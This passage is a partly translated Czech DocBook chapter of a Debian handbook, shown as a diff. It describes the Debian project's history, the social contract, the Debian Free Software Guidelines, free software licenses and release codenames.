+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="the-debian-project">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-the-debian-project.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Cíl</keyword>
+      <keyword>Prostředky</keyword>
+      <keyword>Operace</keyword>
+      <keyword>Dobrovolník</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Projekt Debian</title>
+  <highlights>
+    <para>Než se ponoříme přímo do technologie, pojďme se podívat na to, co to je projekt Debian, jeho cíle, jeho prostředky a jeho provoz.</para>
+  </highlights>
+  <section id="sect.what-is-debian">
+    <title>Co je Debian?</title>
+    <indexterm><primary>sdružení</primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>CULTURE</emphasis> Origin of the Debian name</title>
+
+      <para>Nehledejte dále: Debian není zkratka. Tento název je ve skutečnosti spojení dvou křestních jmen: a to Iana Murdocka, a v té době jeho přítelkyně, Debry. Debra + Ian = Debian.</para>
+    </sidebar>
+
+    <para>Debian je distribuce GNU/Linuxu. O tom, co to je distribuce budeme diskutovat podrobněji v části <xref linkend="sect.role-of-distributions" />, ale nyní budeme jednoduše konstatovat, že se jedná o kompletní operační systém, včetně softwaru a systémů pro instalaci a řízení, vše na základě Linuxového jádra a svobodného softwaru (zejména z projektu GNU).</para>
+
+    <para>Když v roce 1993, pod vedením FSF, vytvořil Debian, měl Ian Murdock jasné cíle, které vyjádřil v <emphasis>Manifestu Debianu</emphasis>. Svobodný operační systém, o který usiloval, musel mít dva hlavní rysy. Za prvé, kvalitu: Debian musí být vyvinut s největší péčí, aby byl hoden linuxového jádra. Musí být rovněž nekomerční distribucí, která dostatečně věrohodně konkuruje velkým komerčním distribucím. Této dvojí ambice by bylo v jeho očích možné dosáhnout pouze otevřením procesu vývoje Debianu, stejně jako v případě Linuxu a projektu GNU. Vzájemná kontrola by tedy neustále tento produkt zlepšovala.</para>
+
+    <sidebar>
+      <title><emphasis>KULTURA</emphasis> GNU, projekt od FSF</title>
+      <indexterm><primary>GNU</primary></indexterm>
+      <indexterm><primary>GNU</primary><secondary>Není UNIX</secondary></indexterm>
+
+      <para>Projekt GNU je řada svobodného softwaru vyvíjeného nebo sponzorovaného nadací Free Software Foundation (FSF), založené svým kultovním vůdcem, Dr. Richardem M. Stallmanem. GNU je rekurzivní zkratka znamenající “GNU Není Unix”.</para>
+    </sidebar>
+
+    <sidebar>
+      <title><emphasis>KULTURA</emphasis> Richard Stallman</title>
+      <indexterm><primary>Stallman, Richard</primary></indexterm>
+      <indexterm><primary>RMS</primary></indexterm>
+
+      <para><acronym>FSF</acronym>'s founder and author of the GPL license,
+      Richard M. Stallman (often referred to by his initials, RMS) is a
+      charismatic leader of the Free Software movement. Due to his
+      uncompromising positions, he is not unanimously admired, but his
+      non-technical contributions to Free Software (in particular at the
+      legal and philosophical level) are respected by everybody.</para>
+    </sidebar>
+    <section>
+      <title>Multiplatformní operační systém</title>
+      <indexterm><primary>meta-distribuce</primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>Společenství</emphasis> cesta Iana Murdocka</title>
+        <indexterm><primary>Ian Murdock</primary></indexterm>
+        <indexterm><primary>Murdock, Ian</primary></indexterm>
+        <indexterm><primary>Progeny</primary></indexterm>
+
+	<para>Ian Murdock, zakladatel projektu Debian, byl jeho první vůdce od roku 1993 do roku 1996. Po předání štafety Bruceu Perensovi zhostil se Ian méně veřejné role. Vrátil se do práce v zákulisí společenství Svobodného softwaru vytvořením firmy Progeny, se záměrem prodávat distribuci odvozenou z Debianu. Tento podnik se stal, bohužel, obchodním nezdarem a vývoj byl ukončen. Společnost, po několika letech přežívání, pouze jako poskytovatel služeb, nakonec v dubnu 2007 vyhlásil bankrot. Z různých projektů započaté Progeny, pouze <emphasis>discover </emphasis> stále zůstává. Jedná se o automatický nástroj pro detekci hardwaru.</para>
+        <para>
+          Ian Murdock died on 28 December 2015 in San Francisco
+          after a series of worrying tweets where he reported
+          having been assaulted by police. In July 2016 it was
+          announced that his death had been ruled a suicide.
+        </para>
+      </sidebar>
+
+      
+      <para>Debian, remaining true to its initial principles, has had so
+      much success that, today, it has reached a tremendous size. The
+      12 architectures offered cover 10 hardware architectures and 2 kernels
+      (Linux and FreeBSD, although the FreeBSD-based ports are not part of the set
+      of officially supported architectures).
+      Furthermore, with more than 25,000 source packages, the available
+      software can meet almost any need that
+      one could have, whether at home or in the enterprise.</para>
+
+      <para>The sheer size of the distribution can be inconvenient: it
+      is really unreasonable to distribute 14 DVD-ROMs to install a complete
+      version on a standard PC… This is why Debian is increasingly considered
+      as a “meta-distribution”, from which one extracts
+      more specific distributions intended for a particular public:
+      Debian-Desktop for traditional office use, Debian-Edu for education
+      and pedagogical use in an academic environment, Debian-Med for
+      medical applications, Debian-Junior for young children, etc. A more
+      complete list of the subprojects can be found in the section dedicated to that purpose,
+      see <xref linkend="sect.sub-projects" />.</para>
+
+      <para>Tyto dílčí pohledy na Debian jsou organizovány v dobře definovaném rámci, což zaručuje bezproblémovou kompatibilitu mezi různými “sub-distribucemi”. Každá z nich se řídí obecným plánem pro vydávání nových verzí. A protože staví na stejných základech, mohou být snadno rozšířeny, dokončeny a personalizovány s aplikacemi dostupnými v repozitářích Debianu.</para>
+      <indexterm><primary>dílčí projekt</primary></indexterm>
+
+      <para>Všechny nástroje Debianu fungují v tomto sledu: <command>debian-cd</command> má již dlouhou dobu povoleno vytvoření sady CD-ROM obsahujících pouze předem vybraný soubor balíků; <command>debian-installer</command> je také modulární instalátor, který se snadno přizpůsobí zvláštním potřebám. <command>APT</command> bude instalovat balíky z různých zdrojů a zároveň garantovat celkovou konzistenci systému.</para>
+
+      <sidebar>
+        <title><emphasis>NÁSTROJ</emphasis> Vytvoření CD-ROM Debianu</title>
+        <indexterm><primary><command>debian-cd</command></primary></indexterm>
+
+	<para><command>debian-cd</command> vytváří ISO obrazy instalačních médií (CD, DVD, Blu-ray, atd.) připravené k použití. Jakékoliv záležitosti týkající se tohoto softwaru jsou diskutovány (v angličtině) na <email>debian-cd@lists.debian.org</email> mailing listu. Tým je pod vedením Steva McIntyra, který řídí oficiální ISO stavební části Debianu.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis> Do každého počítače, jeho architektura</title>
+
+	<para>Termín “architektura” označuje typ počítače (mezi nejvíce známé patří Mac nebo PC). U každé architektury dělá odlišnost především její procesor, obvykle nekompatibilní s ostatními procesory. Tyto rozdíly v hardwaru obnášejí různé provozní prostředky, což vyžaduje, aby byl software kompilován specificky pro každou architekturu.</para>
+        <indexterm><primary>architektura</primary></indexterm>
+        <indexterm><primary>procesor</primary></indexterm>
+
+	<para>Většina softwaru dostupného v Debianu je napsána v přenosných programovacích jazycích: stejný zdrojový kód může být sestaven pro různé architektury. Ve skutečnosti, spustitelný binární soubor, který je kompilován pro specifickou architekturu, nebude obvykle fungovat na ostatních architekturách.</para>
+
+	<para>Připomeňme si, že každý program je vytvořen napsáním zdrojového kódu; tento zdrojový kód je textový soubor složený z instrukcí v daném programovacím jazyce. Než budete moci software používat, je nutné zkompilovat zdrojový kód, což znamená transformovat kód do binárního souboru (série instrukcí stroje spustitelného procesorem). Každý programovací jazyk má konkrétní kompilátor pro provedení této operace (například <command>gcc</command> pro programovací jazyk C).</para>
+        <indexterm><primary>zdroj</primary> <secondary>kód</secondary></indexterm>
+        <indexterm><primary>binární kód</primary></indexterm>
+        <indexterm><primary>kompilace</primary></indexterm>
+        <indexterm><primary>kompilátor</primary></indexterm>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>NÁSTROJ</emphasis> Instalátor</title>
+        <indexterm><primary><command>debian-installer</command> </primary></indexterm>
+
+	<para><command>debian-installer</command> je název instalačního programu Debianu. Jeho modulární konstrukce umožňuje použití v širokém rozsahu instalačních scénářů. Vývojové práce jsou koordinovány na <email>debian-boot@lists.debian.org</email> mailing listu pod vedením Cyrila Bruleboise.</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Kvalita svobodného softwaru</title>
+
+      <para>Debian dodržuje všechny principy svobodného softwaru a jeho nové verze nejsou uvolněny, dokud nejsou připraveny. Vývojáři nejsou nuceni stanoveným plánem spěchat kvůli splnění nějakého termínu. Lidé si často stěžují na dlouhou dobu mezi stabilními verzemi Debianu, ale tato opatrnost také zajišťuje legendární spolehlivost Debianu: dlouhé měsíce testování jsou skutečně nezbytné pro úplnou distribuci k získání štítku “stabilní”.</para>
+
+      <para>Debian nebude dělat kompromisy ve kvalitě: všechny známé kritické chyby jsou vyřešeny v jakékoli nové verzi, i když to vyžaduje odsunutí původně předpokládaného datum vydání.</para>
+    </section>
+    <section>
+      <title>Právní rámec: nezisková organizace</title>
+
+      <para>Po právní stránce, Debian je projekt řízený Americkou neziskovou, dobrovolnickou asociací. Projekt má kolem tisíce <emphasis>vývojářů Debianu</emphasis>, ale sdružuje mnohem větší počet přispěvatelů (překladatelů, těch, co hlásí chyby, umělců, příležitostných vývojářů, atd.).</para>
+
+      <para>Aby se porjekt mohl uskutečnit, má Debian širokou infrastrukturu, s mnoha servery připojenými přes internet, poskytnutými velkým počtem sponzorů.</para>
+
+      <sidebar>
+        <title><emphasis>KOMUNITA</emphasis> Za Debianem, asociace SPI, a místní pobočky</title>
+        <indexterm><primary>sdružení</primary></indexterm>
+        <indexterm><primary>SPI</primary></indexterm>
+        <indexterm><primary>Debian Francie</primary></indexterm>
+        <indexterm><primary>Software ve veřejném zájmu</primary></indexterm>
+
+	<para>Debian doesn't own any server in its own name, since it
+	is only a project within the <emphasis>Software in the Public
+	Interest</emphasis> association, and SPI manages the hardware
+	and financial aspects (donations, purchase of hardware,
+	etc.). While initially created specifically for the Debian
+	project, this association now hosts other free
+	software projects, especially the PostgreSQL database,
+	Freedesktop.org (project for standardization of various parts
+	of modern graphical desktop environments, such as GNOME and
+	KDE Plasma), and the Libre Office office suite.
+	<ulink type="block" url="http://www.spi-inc.org/" /></para>
+
+	<para>Kromě SPI s Debianem úzce spolupracují různá místní sdružení za účelem vytváření finančních prostředků pro projekt, bez centralizace všeho v USA: v žargonu Debianu jsou označovány za “důvěryhodné organizace”. Toto uspořádání umožňuje vyhnout se neúměrným mezinárodním nákladům za převod a dobře se hodí k decentralizované povaze projektu.</para>
+
+	<para>While the list of trusted organizations is rather short,
+	there are many more Debian-related associations whose goal
+	is to promote Debian: <emphasis>Debian France</emphasis>,
+	<emphasis>Debian-ES</emphasis>, <emphasis>debian.ch</emphasis>,
+	and others around the world. Do not hesitate to join your local
+	association and support the project!
+	<ulink type="block" url="https://wiki.debian.org/Teams/Auditor/Organizations" />
+	<ulink type="block" url="https://france.debian.net/" />
+	<ulink type="block" url="http://www.debian-es.org/" />
+	<ulink type="block" url="https://debian.ch/" />
+	</para>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.foundation-documents">
+    <title>Dokumenty nadace</title>
+    <indexterm><primary>Dokumenty nadace</primary></indexterm>
+
+    <para>Několik let po prvotním vydání, Debian formálně stanovil principy, které by měl dodržovat jako svobodný software. Toto úmyslně aktivistické rozhodnutí umožňuje řádný a bezproblémový růst tím, že zajistí, aby se všechny části ubíraly stejným směrem. K tomu, aby se stal vývojářem Debianu, musí každý uchazeč potvrdit a prokázat svou podporu a dodržování zásad stanovených v nadačních dokumentech projektu.</para>
+
+    <para>Proces vývoje je neustále projednáván, ale tyto nadační dokumenty jsou obecně a shodně podporovány, a tak zřídka měněny. Stanovy Debianu nabízí také další záruky pro jejich stálost: ke schválení jakékoliv jejich změny je potřeba tří čtvrtin kvalifikované většiny.</para>
+
+    <section id="sect.social-contract">
+      <title>Závazek vůči uživatelům</title>
+      <indexterm><primary>společenská smlouva</primary></indexterm>
+      <indexterm><primary>smlouva, společenský</primary></indexterm>
+
+      <para>Projekt má také “společenskou smlouvu”. Jaké místo má takovýto text v projektu, který je určen pouze pro vývoj operačního systému? To je docela jednoduché: Debian pracuje pro své uživatele, a tím potažmo i pro společnost. Tato smlouva shrnuje závazky, ke kterým se projekt zavazuje. Dovolte nám je podrobněji popsat:</para>
+
+      <orderedlist>
+        <listitem>
+	  <para>Debian zůstane ze 100% zdarma.</para>
+
+	  <para>Toto je pravidlo č. 1. Debian je a zůstane zcela a výhradně složen z volného softwaru. Navíc, veškerý vývoj softwaru sám o sobě v rámci projektu Debian, bude zdarma.</para>
+
+          <sidebar>
+            <title><emphasis>POHLED</emphasis>za software</title>
+
+	    <para>První verze sociální smlouvy Debianu říkala “Debian zůstane 100% svobodný <emphasis>software</emphasis>”. Vyouštění tohoto slova (se schválením verze 1.1 smlouvy v dubnu 2004) naznačuje vůli dosáhnout svobody, a to nejen v softwaru, ale také v dokumentaci a jakémkoliv jiném prvku, který Debian chce poskytovat v rámci svého operačního systému.</para>
+
+	    <para>Tato změna, která byla zamýšlena pouze jako redakční, měla ve skutečnosti četné následky, zejména v odstranění některé problematické dokumentace. Navíc, problém představuje také stále častější používání firmwaru v ovladačích: mnohé z nich nejsou volné, ale jsou nezbytné pro správné fungování odpovídajícího hardwaru.</para>
+          </sidebar>
+        </listitem>
+        <listitem>
+	  <para>Vratíme se zpět ke komunitě svobodného softwaru.</para>
+
+	  <para>Jakékoli zlepšení, kterým projekt Debian přispěl k práci zahrnuté v distribuci, je zasláno zpět autorovi ( tzv. “upstream”). Obecně, Debian bude spolupracovat s komunitou spíše, než pracovat v izolaci.</para>
+
+          <sidebar>
+            <title><emphasis>KOMUNITA</emphasis> Upstreamový autor nebo vývojář Debianu?</title>
+            <indexterm><primary>upstreamový autor</primary></indexterm>
+            <indexterm><primary>autor, upstream </primary></indexterm>
+            <indexterm><primary>upstream</primary></indexterm>
+
+	    <para>Termínem “upstreamový autor” se rozumí autor (autoři) / vývojář (vývojáři) díla, ti, kteří ho píší a vyvíjí. Na druhou stranu, “vývojář Debianu” používá už existující práci a zahrnuje ji do balíku Debianu (termín “správce Debianu” je vhodnější).</para>
+
+	    <para>V praxi se takové rozlišování často nepovažuje za jednoznačné. Správce Debianu může napsat opravu, která prospívá všem uživatelům díla. Obecně Debian podporuje ty, kteří mají balíček v Debianu na starosti, aby se také zapojili do “upstreamového” vývoje (tak se potom stanou přispěvateli, aniž by byli omezeni na roli pouhých uživatelů programu).</para>
+          </sidebar>
+        </listitem>
+        <listitem>
+	  <para>Nebudeme skrývat problémy.</para>
+
+	  <para>Debian není dokonalý a nové problémy, které je třeba opravit budeme nacházet každý den. Celou databázi chybových hlášení budeme mít pro veřejnost kdykoliv otevřenou k nahlédnutí. Hlášení, která lidé zakládají online se okamžitě zviditelní ostatním.</para>
+        </listitem>
+        <listitem>
+	  <para>Našimi prioritami jsou naši uživatelé a svobodný software.</para>
+
+	  <para>Tento závazek je obtížnější definovat. Debian ukládá, tedy pokud je zapotřebí učinit rozhodnutí, zahodit pro vývojáře jednoduché řešení, které bude ohrožovat uživatelskou přívětivost, rozhodout se pro elegantnější řešení, i když je obtížnější ho realizovat. To znamená, že prioritou je zohlednit zájmy uživatelů a volného softwaru.</para>
+        </listitem>
+        <listitem>
+	  <para>Práce, které nesplňují naše standardy volného softwaru.</para>
+
+	  <para>Debian akceptuje a chápe, že uživatelé mohou chtít používat některé programy, co nejsou volné. Proto projekt umožňuje využití částí své infrastruktury k distribuci debianovských balíčků nesvobodného softwaru, které lze bezpečně předistribuovat.</para>
+
+          <sidebar>
+            <title><emphasis>KOMUNITA</emphasis> Pro nebo proti nesvobodné sekci?</title>
+            <indexterm><primary>nesvobodný</primary></indexterm>
+            <indexterm><primary>sekce</primary> <secondary>nesvobodná</secondary></indexterm>
+
+	    <para>Závazek udržovat strukturu pro přizpůsobení nesvobodného softwaru (tj. “nesvobodná” sekce, viz postranní panel <xref linkend="sidebar.sections" />) je často předmětem debaty v rámci komunity Debianu.</para>
+
+	    <para>Odpůrci tvrdí, že se to odvrací lidi od volných softwarových ekvivalentů, a je v rozporu se zásadou ve věci poskytování pouze svobodného software. Příznivci nekompromisně konstatují, že většina nesvobodných balíků jsou “téměř zdarma”, a zadržovány jedním nebo dvěma otravnými omezeními (nejběžnější je zákaz komerčního používání softwaru). Distribucí těchto děl v nesvobodné větvi, nepřímo říkáme autorovi, že jeho dílo by bylo lépe známé a hojně používané, pokud by bylo zahrnuto v hlavní sekci. Jsou tak zdvořile vyzváni, aby změnili svou licenci tak, aby vyhovovala tomuto záměru.</para>
+
+	    <para>Po prvním, bezvýsledném pokusu v roce 2004, je navrácení úplného odstranění nesvobodné sekce na pořad jednání nepravděpodobné, zejména proto, že obsahuje mnoho užitečných dokumentů, které byly přesunuty jednoduše proto, že nesplňovaly nové požadavky pro hlavní část. To platí zejména pro některé soubory dokumentace softwaru vydané projektem GNU (zejména Emacs a Make).</para>
+
+	    <para>Pokračující existence nesvobodné sekce je zdrojem příležitostných třenic s Nadací svobodného softwaru, a je hlavním důvodem, proč odmítá oficiálně doporučit Debian jako operační systém.</para>
+          </sidebar>
+        </listitem>
+      </orderedlist>
+    </section>
+    <section id="sect.dfsg">
+      <title>Pokyny Debianu pro svobodný software</title>
+      <indexterm><primary>zásady volného softwaru</primary></indexterm>
+      <indexterm><primary>DFSG</primary></indexterm>
+      <indexterm><primary>Pokyny Debianu pro sovobodný software</primary></indexterm>
+      <indexterm><primary>volný</primary><secondary>software</secondary></indexterm>
+
+      <para>Tento referenční dokument určuje, který software je “dostatečně volný”, aby byl zahrnut do Debianu. Pokud je licence programu v souladu s těmito zásadami, může být zahrnuta do hlavní části; Naopak, a za předpokladu, že volné šíření je zakázáno, jej lze nalézt v nesvobodné sekci. Nesvobodná sekce není oficiální součástí Debianu; Jedná se o přidanou službu poskytovanou uživatelům.</para>
+
+      <para>Více než jen výběrovými kritérii pro Debian, se tento text se stal autoritou na téma svobodného softwaru, a sloužil jako základ pro “definici Open Source”. Historicky je tedy jednou z prvních formálních definic pojmu “svobodný software”.</para>
+
+      <para>Všeobecná veřejná licence GNU, BSD licence a Umělecká licence jsou příklady tradičních svobodných licencí, které ctí 9 bodů uvedených v tomto textu. Níže najdete text, který je publikován na webových stránkách Debianu. <ulink type="block" url="http://www.debian.org/social_contract#pokyny" /></para>
+      <orderedlist>
+        <listitem>
+          <formalpara>
+            <title>Volná redistribuce.</title>
+
+	    <para>Licence na jakoukoliv součást Debianu nesmí omezovat žádnou stranu v prodeji nebo darování softwaru jako součásti souhrnné distribuce softwaru obsahující programy z několika různých zdrojů. Licence nesmí zahrnovat honorář nebo jiný poplatek za tento prodej.</para>
+          </formalpara>
+
+          <sidebar>
+            <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis>Svobodná licence</title>
+            <indexterm><primary>licence</primary> <secondary>BSD</secondary></indexterm>
+            <indexterm><primary>BSD licence</primary></indexterm>
+            <indexterm><primary>licence</primary> <secondary>GPL</secondary></indexterm>
+            <indexterm><primary>GPL</primary></indexterm>
+            <indexterm><primary>GNU</primary> <secondary>Obecné veřejné licence</secondary></indexterm>
+            <indexterm><primary>Obecná veřejná licence</primary></indexterm>
+            <indexterm><primary>licence</primary> <secondary>umělecké</secondary></indexterm>
+            <indexterm><primary>umělecké licence</primary></indexterm>
+
+	    <para>GNU GPL, BSD licence a Umělecká licence jsou v souladu s Pokyny Debianu pro svobodný software, i když jsou velmi odlišné.</para>
+
+	    <para>GNU GPL, kterou používá a propaguje FSF (Free Software Foundation), je nejběžnější. Její hlavní vlastností je, že se vztahuje i na práci z ní vycházející, která se redistribuje: program zahrnující nebo používající GPL kód může být distribuován pouze v souladu s jeho podmínkami. Zakazuje tedy jakékoli opětovné použití v proprietární aplikaci. To představuje vážné problémy při opětovném použití GPL kódu ve volném softwaru nevyhovujícímu této licenci. Takto je někdy nemožné propojit program zveřejněný pod jinou licencí svobodného softwaru s knihovnou distribuovanou pod GPL. Na druhou stranu, tato licence je velmi pevná v základech v americkém právu: právníci FSF se podíleli na jejím navrhování, takže narušitelé jsou často nuceni dosáhnout přátelské dohody s FSF, aniž by se šlo k soudu. <ulink type="block" url="http://www.gnu.org/copyleft/gpl.html" /></para>
+
+	    <para>The BSD license is the least restrictive: everything is
+	    permitted, including use of modified BSD code in a proprietary
+            application.
+            <ulink type="block" url="http://www.opensource.org/licenses/bsd-license.php" /></para>
+
+	    <para>Nakonec, Umělecká licence dosahuje kompromisu mezi těmito ostatními dvěma: je povoleno zahrnuzí kódu do proprietární aplikace, ale jakákoliv modifikace musí být zveřejněna. <ulink type="block" url="http://www.opensource.org/licenses/artistic-license-2.0.php" /></para>
+
+	    <para>Kompletní znění těchto licencí je k dispozici v <filename>/usr/share/Common-licenses/</filename> v libovolném systému Debianu.</para>
+          </sidebar>
+        </listitem>
+        <listitem>
+          <formalpara>
+            <title>Zdrojový kód.</title>
+
+	    <para>Program musí obsahovat zdrojový kód a musí umožňovat distribuci ve zdrojovém kódu, stejně jako v kompilované podobě.</para>
+          </formalpara>
+        </listitem>
+        <listitem>
+          <formalpara>
+            <title>Odvozená díla.</title>
+
+	    <para>Licence musí umožňovat úpravy a odvozená díla, a musí umožňovat jejich distribuci za stejných podmínek jako měla licence původního softwaru.</para>
+          </formalpara>
+        </listitem>
+        <listitem>
+          <formalpara>
+            <title>Integrita zdrojového kódu autora.</title>
+
+	    <para>Licence může omezit distribuci zdrojového kódu v modifikované podobě <emphasis>pouze</emphasis> pokud licence umožňuje distribuci “patch souborů” se zdrojovým kódem pro účely úpravy programu v okamžiku sestavení. Licence musí výslovně umožňovat distribuci softwaru vytvořeného z modifikovaného zdrojového kódu. Licence může vyžadovat, aby odvozená díla nesla název nebo číslo odlišné od původního softwaru (<emphasis>Toto je kompromis. Skupina Debian nabádá všechny autory, aby nezakazovali úpravy souborů, zdrojových nebo binárních</emphasis>).</para>
+          </formalpara>
+        </listitem>
+        <listitem>
+          <formalpara>
+            <title>Žádná diskriminace osob nebo skupin.</title>
+
+	    <para>Licence nesmí diskriminovat žádnou osobu ani skupinu osob.</para>
+          </formalpara>
+        </listitem>
+        <listitem>
+          <formalpara>
+            <title>Diskriminace proti žádné oblasti lidského úsilí.</title>
+
+	    <para>Licence nesmí nikomu bránit v užívání programu v konkrétní oblasti lidského úsilí. Například nesmí zakazovat používání programu v podnicích nebo při genetickém výzkumu.</para>
+          </formalpara>
+        </listitem>
+        <listitem>
+          <formalpara>
+            <title>Přenesení licence.</title>
+
+	    <para>Práva spojená s programem se musí vztahovat na všechny, komu je program distribuován bez nutnosti provedení dodatečné licence těmito stranami.</para>
+          </formalpara>
+        </listitem>
+        <listitem>
+          <formalpara>
+            <title>Licence nemůže být pro Debian specifická.</title>
+
+	    <para>Práva spojená s programem nemůžou záviset na tom, že je program součástí systému Debian. Pokud je program vyjmut z Debianu a používán nebo distribuován bez Debianu, ale jinak v rámci podmínek licence programu, všechny strany, kterým je program distribuován, by měly mít stejná práva jako ta, která jsou udělena ve spojení se systémem Debian.</para>
+          </formalpara>
+        </listitem>
+        <listitem>
+          <formalpara>
+            <title>Licence nesmí kontaminovat jiný software.</title>
+
+	    <para>Licence nesmí omezovat ostatní software, který je distribuován spolu s licencovaným softwarem. Například, licence nesmí trvat na tom, že všechny ostatní programy distribuované na stejném médiu musí být svobodný software.</para>
+          </formalpara>
+
+          <sidebar>
+            <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis> Copyleft</title>
+            <indexterm><primary>copyleft</primary></indexterm>
+            <indexterm><primary>copyrights</primary></indexterm>
+
+	    <para>Copyleft je princip, který spočívá v používání autorských práv k zaručení svobody díla a děl z něho odvozených, spíše než k omezení práv na užívání, jako je tomu u proprietárního softwaru. Je to také hra se slovy z pojmu “Copyright”. Richard Stallman přišel na tuto myšlenku, když mu jeho přítel, co má rád slovní hříčky, napsal na jemu adresovanou obálku: “copyleft: všechna práva obrácena”. Copyleft ukládá zachování všech počátečních svobod po distribuci původní nebo modifikované verze díla (obvykle programu). Není tedy možné distribuovat program jako proprietární software, pokud je odvozen z kódu programu, který byl vydán pod copyleftem.</para>
+
+	    <para>Nejznámější skupinou copyleftových licencí je samozřejmě GNU GPL a její deriváty, GNU LGPL nebo Nižší všeobecná veřejná licence a GNU FDL nebo GNU Svobodná licence pro dokumentaci. Je smutné, že copyleftové licence jsou obyčejně vzájemně neslučitelné. V důsledku toho je nejlepší použít pouze jednu z nich.</para>
+          </sidebar>
+        </listitem>
+      </orderedlist>
+
+      <sidebar id="sidebar.bruce-perens">
+        <title><emphasis>KOMUNITA</emphasis> Bruce Perens, kontroverzní vůdce</title>
+        <indexterm><primary>Bruce Perens</primary></indexterm>
+        <indexterm><primary>Perens, Bruce</primary></indexterm>
+        <indexterm><primary>Open Source</primary></indexterm>
+
+	<para>Bruce Perens byl druhým vedoucím projektu Debian, těsně po Ianu Murdockovi. Byl velmi kontroverzní ve svých dynamických a autoritářských metodách. Přesto zůstává důležitým přispěvatelem Debianu, jemuž je Debian obzvláště zavázán pro sestavení věhlasných “Směrnic Debianu pro svobodný software” (DFSG), původní myšlenky Eana Schuesslera. Následně, Bruce z nich odvodil slavnou “Definici pro Open Source”, kdy z nich odstranil všech odkazy na Debian. <ulink type="block" url="http://www.opensource.org/" /></para>
+
+	<para>Jeho odchod z projektu byl dost emotivní, ale Bruce zůstal silně připojený k Debianu, protože stále pokračuje v propagaci této distribuce v politických a ekonomických sférách. Stále se sporadicky objevuje na e-mailových konferencích, aby přispěl svou radou a představil své nejnovější iniciativy ve prospěch Debianu.</para>
+        <indexterm><primary>kódové označení</primary></indexterm>
+        <indexterm><primary>označení</primary><secondary>kódové označení</secondary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Rex</emphasis> </primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Buzz</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Bo</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Hamm</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Slink</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Potato</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Woody</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Sarge</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Etch</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Lenny</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Squeeze</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Wheezy</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Jessie</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Stretch</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Buster</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Bullseye</emphasis></primary></indexterm>
+        <indexterm><primary><emphasis role="distribution">Sid</emphasis></primary></indexterm>
+        <indexterm><primary>Toy Story</primary></indexterm>
+        <indexterm><primary>Pixar</primary></indexterm>
+
+	<para>Last anecdotal point, it was Bruce who was responsible for
+	inspiring the different “codenames” for Debian versions
+	(1.1 — <emphasis role="distribution">Rex</emphasis>,
+	1.2 — <emphasis role="distribution">Buzz</emphasis>,
+	1.3 — <emphasis role="distribution">Bo</emphasis>,
+	2.0 — <emphasis role="distribution">Hamm</emphasis>,
+	2.1 — <emphasis role="distribution">Slink</emphasis>,
+	2.2 — <emphasis role="distribution">Potato</emphasis>,
+	3.0 — <emphasis role="distribution">Woody</emphasis>,
+	3.1 — <emphasis role="distribution">Sarge</emphasis>,
+	4.0 — <emphasis role="distribution">Etch</emphasis>,
+	5.0 — <emphasis role="distribution">Lenny</emphasis>,
+	6.0 — <emphasis role="distribution">Squeeze</emphasis>,
+	7 — <emphasis role="distribution">Wheezy</emphasis>,
+        8 — <emphasis role="distribution">Jessie</emphasis>,
+        9 — <emphasis role="distribution">Stretch</emphasis>,
+        10 (not released yet) — <emphasis role="distribution">Buster</emphasis>,
+        11 (not released yet) — <emphasis role="distribution">Bullseye</emphasis>,
+	<emphasis role="distribution">Unstable</emphasis> —
+	<emphasis role="distribution">Sid</emphasis>).
+	They are taken from the names
+	of characters in the Toy Story movie. This animated film entirely
+	composed of computer graphics was produced by Pixar Studios, with
+	whom Bruce was employed at the time that he led the Debian
+	project. The name “Sid” holds particular status, since it will
+	eternally be associated with the <emphasis role="distribution">Unstable</emphasis> branch. In the film, this
+	character was the neighbor child, who was always breaking toys —
+	so beware of getting too close to <emphasis role="distribution">Unstable</emphasis>. Otherwise, <emphasis role="distribution">Sid</emphasis> is also an acronym for “Still
+	In Development”.</para>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.debian-internals">
+    <title>Vnitřní fungování projektu Debian</title>
+    <indexterm><primary>operace, vnitřní</primary></indexterm>
+    <indexterm><primary>organizace, interní</primary></indexterm>
+
+    <para>Bohaté konečné výsledky vyproduktované projektem Debian vycházejí současně z práce na infrastruktuře prováděné zkušenými vývojáři Debianu, z  individuálních nebo kolektivních prací vývojářů na debianovských balíčcích a z reakcí uživatelů.</para>
+    <section>
+      <title>Vývojáři Debianu</title>
+      <indexterm><primary>vývojáři</primary> <secondary>vývojáři Debianu</secondary></indexterm>
+
+      <para>Debian developers have various responsibilities, and as
+      official project members, they have great influence on the direction
+      the project takes. A Debian developer is generally responsible for at
+      least one package, but according to their available time and desire,
+      they are free to become involved in numerous teams, acquiring, thus,
+      more responsibilities within the project.
+      <ulink type="block" url="https://www.debian.org/devel/people" />
+      <ulink type="block" url="https://www.debian.org/intro/organization" />
